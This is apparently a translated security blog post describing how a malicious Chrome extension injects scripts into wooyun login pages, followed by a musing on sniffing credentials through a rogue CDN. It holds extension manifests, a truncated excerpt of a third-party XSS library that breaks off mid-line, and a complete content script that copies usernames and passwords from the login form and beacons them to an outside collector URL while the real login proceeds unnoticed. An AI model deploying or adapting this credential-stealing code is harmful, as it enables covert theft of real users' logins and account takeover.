0x00 Chrome plug-ins
--------------------------
This idea came to mind when I saw @Zi mengxiao's post yesterday.
The idea is as follows:
A Chrome extension's manifest.json controls which pages its content script (contentscript.js) is injected into. So can a seemingly normal extension carry one small extra: injecting <script src=//xsser.me></script> into every wooyun page?
Let's try it. (For convenience, the script just pops an alert box.)
manifest.json content:
    {
      "name": "XiaoChaJian",
      "version": "1.0",
      "manifest_version": 2,
      "author": "VIP",
      "icons": { "128": "icon.png" },
      "permissions": [ "tabs", "http://*/*", "https://*/*" ],
      "content_scripts": [
        {
          "js": ["contentscript.js"],
          "matches": ["http://wooyun.org/*", "http://*.wooyun.org/*"]
        }
      ]
    }
contentscript.js content:
    alert(/xss/);
If the alert is swapped for a script loaded from xsser.me, can the cookies be captured as expected?
Unfortunately this does not work on wooyun, because wooyun's cookies are HttpOnly, so page-level JavaScript cannot read them. An extension can still read HttpOnly cookies (that is how EditThisCookie and the cookie-emulation extensions do it: the chrome.cookies API returns them, given the "cookies" permission, which the manifest above does not request), but that is more hassle, so another idea came up: on the wooyun login page, inject @Sogili's xss.js and use JavaScript to hijack the form. Can the username and password then be sent wherever we like?
Practice:
manifest.json content:
    {
      "name": "JieChiBiaoDan",
      "version": "1.0",
      "manifest_version": 2,
      "author": "VIP",
      "icons": { "128": "icon.png" },
      "permissions": [ "tabs", "http://*/*", "https://*/*" ],
      "content_scripts": [
        {
          "js": ["contentscript.js"],
          "matches": [
            "http://wooyun.org/user.php?action=login*",
            "http://www.wooyun.org/user.php?action=login*"
          ]
        }
      ]
    }
contentscript.js content (the head of @Sogili's xss.js; the page cuts off partway through):
    var xss = function () {
        var x = { 'name': 'xss.js', 'version': '0.2.1', 'author': 'Long short (sogili)' };
        x.x = function (id) { return document.getElementById(id) };
        // error-tolerant eval
        x.e = function (_) { try { return eval('(' + _ + ')') } catch (e) { return '' } };
        // browser detection
        x.i = {
            i: !!self.ActiveXObject && (function () {
                for (var v = 6, s = document.createElement('s');
                     s.innerHTML = '<!--[if gt IE ' + (v++) + ']><i></i><![endif]-->',
                     s.getElementsByTagName('i')[0];);
                return v;
            }()),
            c: !!self.chrome,
            f: self.mozPaintCount > -1,
            o: !!self.opera,
            s: !self.chrome && !!self.WebKitPoint
        };
        // UA
        x.ua = navigator.userAgent;
        // is this an Apple handheld device
        x.apple = /ip(one|ad|od)/i.test(x.ua);
        // random number
        x.rdm = function () { return ~~(Math.random() * 1e5) };
        // URL encoding (UTF-8)
        x.ec = encodeURIComponent;
        x.html = function () { return document.getElementsByTagName('html')[0] || document.write('
http://vip.yupage.com/wy.php (the receiving page):
Now test it. Open the login page, fill in the username, password and captcha, and click log in. The form data is first POSTed to my receiving page, and only then to wooyun.
Looking at the receiving page: the username and password are already there.
Without the user noticing anything, the username and password have been hijacked. And wooyun's WB transfer function has no secondary verification, so the stolen credentials are all an attacker needs.
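The post's own content script builds on @Sogili's xss.js, of which only the head survives above, and the receiving page is not shown. As an added example that is not the post's code, the following is a self-contained content script that does the same form hijack: it hooks the login form's submit event, copies the credential fields and fires them at the collector (the post's http://vip.yupage.com/wy.php is reused as the collector URL) with an image beacon, then lets the genuine login proceed. The field-type filter and the helper names are my own; the helpers are plain functions so they can also be exercised outside a browser against a small stand-in form object.

```javascript
'use strict';
// Added example content script (not from the original post).
// Injected by a manifest whose "matches" covers the login page, it hooks the
// form's submit event, copies credential fields and beacons them to a
// collector before the real submission continues.

// Input types worth stealing (assumption: text/email/tel carry the username).
const CREDENTIAL_TYPES = new Set(['password', 'email', 'text', 'tel']);

// Collect name=value pairs from a form. Works on a DOM form or any object
// exposing an `elements` iterable of {name, type, value} (used by the test).
function harvestForm(form) {
  const out = {};
  for (const el of Array.from(form.elements)) {
    if (!el.name) continue;
    if (!CREDENTIAL_TYPES.has((el.type || 'text').toLowerCase())) continue;
    out[el.name] = el.value;
  }
  return out;
}

// Build the beacon URL: collector + urlencoded fields + the page the form was on.
function buildBeaconUrl(collector, fields, pageUrl) {
  const pairs = Object.entries(fields).map(
    ([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v));
  pairs.push('src=' + encodeURIComponent(pageUrl));
  return collector + '?' + pairs.join('&');
}

// Attach the hook. `send` is injectable so a test can capture the URL instead
// of creating an <img>. Returns the handler for inspection.
function hijackForm(form, collector, send) {
  const handler = function () {
    const page = typeof location !== 'undefined' ? location.href : '';
    send(buildBeaconUrl(collector, harvestForm(form), page));
    // No preventDefault: the genuine login goes ahead, so the victim sees nothing odd.
  };
  form.addEventListener('submit', handler);
  return handler;
}

// Default beacon: a plain image request needs no CORS and no extra permission.
function imageBeacon(url) {
  const img = new Image();
  img.src = url;
}

// Entry point when running as a content script on the matched login page.
if (typeof document !== 'undefined') {
  const form = document.querySelector('form');
  if (form) hijackForm(form, 'http://vip.yupage.com/wy.php', imageBeacon);
}

if (typeof module !== 'undefined' && module.exports) {
  module.exports = { harvestForm, buildBeaconUrl, hijackForm };
}
```

Because the beacon is a GET for an image, it needs none of the host permissions or CORS headers a fetch would; the collector simply logs its query string. The submit handler does not cancel the event, which is what keeps the theft invisible: the user lands in their account as normal.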
0x01 CDN
---------------
Many websites now use a CDN for acceleration and DDoS protection.
I looked up how a CDN works; roughly like this:
    User access --> automatically assigned to the fastest node --> request to the origin server
                                                                                |
    Data returned to user <-- returned to the node server <-- returned from the origin server <--+
So, could we build a malicious CDN and then sniff the usernames and passwords of every site that uses it?